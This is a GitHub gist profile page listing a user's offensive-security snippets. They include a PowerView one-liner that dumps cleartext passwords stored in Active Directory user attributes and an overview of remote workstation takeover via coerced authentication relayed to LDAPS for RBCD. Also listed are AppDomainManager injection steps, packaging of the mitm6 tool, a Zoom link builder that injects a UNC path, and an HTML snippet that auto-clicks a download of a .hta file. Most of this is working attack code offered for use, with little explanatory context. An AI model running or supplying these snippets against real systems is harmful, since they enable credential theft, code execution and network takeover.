Skip to content

Instantly share code, notes, and snippets.

View C0axx's full-sized avatar

Curtis Ringwald C0axx

64 followers · 93 following
View GitHub Profile
@C0axx
C0axx / gist:334294bafa7bd83cc9625fc1cfe71a2a
Created October 29, 2022 19:36 — forked from dafthack/gist:5f8c36f7468fad991e9e1f6d81ec29d4
PowerView One-Liner to Dump Cleartext Passwords From AD User Attributes
$users = Get-NetUser; $props=@(); $users | Get-Member | foreach-object{if($_.Name -notlike "badpassword*"){$props+=$_.Name}}; foreach($user in $users){ foreach($prop in $props){ if($user.$prop -like "*password*" -and $user.$prop -notlike "*dont_expire_password" -and $user.$prop -notlike "*RODC Password*"){Write-Output ($user.samAccountName + "[" + $prop + "]" + " : " + $user.$prop) } } }
@C0axx
C0axx / Workstation-Takeover.md
Created September 25, 2022 00:17 — forked from mgeeky/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@C0axx
C0axx / _Instructions_Reproduce.md
Created April 29, 2020 20:36
GhostLoader - AppDomainManager - Injection - 攻壳机动队

GhostLoader Steps :)

1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
@C0axx
C0axx / Static python executable.txt
Created April 7, 2020 19:30 — forked from 0xhexmex/Static python executable.txt
How to turn a python script into a statically linked executable with pyinstaller and staticx
// Example below is with mitm6 (https://github.com/fox-it/mitm6/)
// Note: Adding the '--add-binary' option here is specific to mitm6, not required in all cases.
# pip install pyinstaller
# pyinstaller --clean -F --add-binary="/usr/lib/x86_64-linux-gnu/libpython2.7.so.1.0:." ./mitm6.py
// The step above will create a single binary in the ./dist/ directory called mitm6
// Install staticx and dependencies
@C0axx
C0axx / c99-nl.py
Created April 5, 2020 18:47 — forked from si9int/c99-nl.py
Automates https://subdomainfinder.c99.nl | Usage: python3 c99-nl.py <domain.com> | Requirements: pip3 install bs4
#!/usr/bin/env python3
import requests, sys
from bs4 import BeautifulSoup as bs
domain = sys.argv[1]
subdomains = []
params = {
'CSRF102664102' : 'geek100526529',
'CSRF105639185' : 'espionage103090877',
@C0axx
C0axx / converter.js
Created April 5, 2020 16:55
Zoom UNC Injection via Link Previews
// Usage to build a custom url
// sabri@localhost Desktop % node converter.js "cmd=sic&type=none&uss=355fed60.8b5mS4m5-EvxX4mpOGePJnqP7eHtppIFCmhYCQWWa8Da49yd91RbLyWP6RwF31vD&cnonce=3YHffyG67M1KfWNLg-JiWofUJJRpcAmCck9W3n0-MKA-&app=chrome&from=meeting&previewUrl=%5C%5C%3F%5CC%3A%5CWindows%5Cexplorer.exe&downloadUrl=%5C%5C%3F%5CC%3A%5CWindows%5Cexplorer.exe&fileName=Click%20for%20me%20%40pwnsdx&fileSize=240&fileId=&thumbnailUrl=https%3A%2F%2Fwww.getdigital.eu%2Fweb%2Fgetdigital%2Fgfx%2Fproducts%2F__generated__resized%2F380x380%2FAufkleber_Trollface.jpg"
// Your URL is zoommtg://zoom.us/zoom?mcf=0&browser=chrome&confid=Y21kPXNpYyZ0eXBlPW5vbmUmdXNzPTM1NWZlZDYwLjhiNW1TNG01LUV2eFg0bXBPR2VQSm5xUDdlSHRwcElGQ21oWUNRV1dhOERhNDl5ZDkxUmJMeVdQNlJ3RjMxdkQmY25vbmNlPTNZSGZmeUc2N00xS2ZXTkxnLUppV29mVUpKUnBjQW1DY2s5VzNuMC1NS0EtJmFwcD1jaHJvbWUmZnJvbT1tZWV0aW5nJnByZXZpZXdVcmw9JTVDJTVDJTNGJTVDQyUzQSU1Q1dpbmRvd3MlNUNleHBsb3Jlci5leGUmZG93bmxvYWRVcmw9JTVDJTVDJTNGJTVDQyUzQSU1Q1dpbmRvd3MlNUNleHBsb3Jlci5leGUmZmlsZU5hbWU9Q2xpY2slMjBmb3Il
@C0axx
C0axx / downloader.html
Created January 30, 2020 18:47 — forked from rvrsh3ll/downloader.html
<a href="#" id="download">legit</al>
<script>
var element = document.getElementById("download");
element.href = "legit.hta";
element.click();
</script>